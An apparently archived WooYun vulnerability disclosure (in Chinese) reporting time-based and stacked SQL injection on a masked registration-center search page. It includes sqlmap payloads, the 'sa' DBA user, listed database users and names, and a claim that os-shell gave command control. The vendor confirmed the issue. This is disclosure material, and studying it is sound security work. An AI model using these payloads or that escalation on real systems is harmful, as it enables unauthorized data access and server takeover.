乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-05: 细节已通知厂商并且等待厂商处理中 2016-01-08: 厂商已经确认,细节仅向厂商公开 2016-01-18: 细节向核心白帽子及相关领域专家公开 2016-01-28: 细节向普通白帽子公开 2016-02-07: 细节向实习白帽子公开 2016-02-20: 细节向公众公开
——
注入点:
http://**.**.**.**/zys/search/?action=list&bid=0&key=1
key存在注入,为时间盲注,比较慢
[22:29:22] [INFO] resuming back-end DBMS 'microsoft sql server'[22:29:23] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: action=list&bid=0&key=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: action=list&bid=0&key=1' WAITFOR DELAY '0:0:5'-----[22:29:23] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[22:29:23] [INFO] fetching current user[22:29:23] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically[22:29:23] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n][22:29:29] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads[22:29:40] [INFO] adjusting time delay to 1 second due to good response timess[22:29:47] [ERROR] invalid character detected. retrying..[22:29:47] [WARNING] increasing time delay to 2 secondsacurrent user: 'sa'[22:29:52] [INFO] fetching current database[22:29:52] [INFO] retrieved: Zys2010current database: 'Zys2010'[22:30:49] [INFO] testing if current user is DBAcurrent user is DBA: Truedatabase management system users [9]:[*] dbtest[*] GDWSBSDT[*] gdzczx[*] gdzczx5026[*] sa[*] smartsoft[*] smartsoft_test[*] vc[*] xzxkavailable databases [42]:[*] [gdzczx5000-2014-1][*] [gdzczx5000-2014][*] [gdzczx5000-2015][*] [gdzczx5000-618][*] [gdzczx5000_2014-1-15][*] [gdzczx5000_2014-2-13][*] [gdzczx5000_2014-2-20][*] [gdzczx9000-copy][*] [RegisterManager_Test][*] [YM_Test][*] gdzczx[*] gdzczx5000[*] gdzczx50009888888888[*] gdzczx50009999999999[*] gdzczx5000_20121008[*] gdzczx5001[*] gdzczx5026[*] gdzczx5027[*] gdzczx5028[*] gdzczx5029[*] gdzczx_web[*] gdzczx_web2013[*] master[*] model[*] msdb[*] QueryWork[*] RegisterManager[*] RegisterManager_CXXT[*] ReportServer[*] ReportServerTempDB[*] Spider[*] tempdb[*] test[*] TestRM[*] XZXK[*] XZXK5026[*] XZXK5099[*] Zys2010[*] Zys2010_Test[*] Zys2010_Test20121113[*] 二级建造师_北京[*] 延续注册名单
42个数据库,又跟广东省建设执业资格注册中心挂在一起,数据量很大,因为是时间盲注,就不继续了!~~~
上面测试是DBA权限,试试os-shell,发现可以控制!~~~而且权限很大!~~~测试几个命令看看!~~~
如上
你们懂!~~~
危害等级:高
漏洞Rank:10
确认时间:2016-01-08 11:08
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无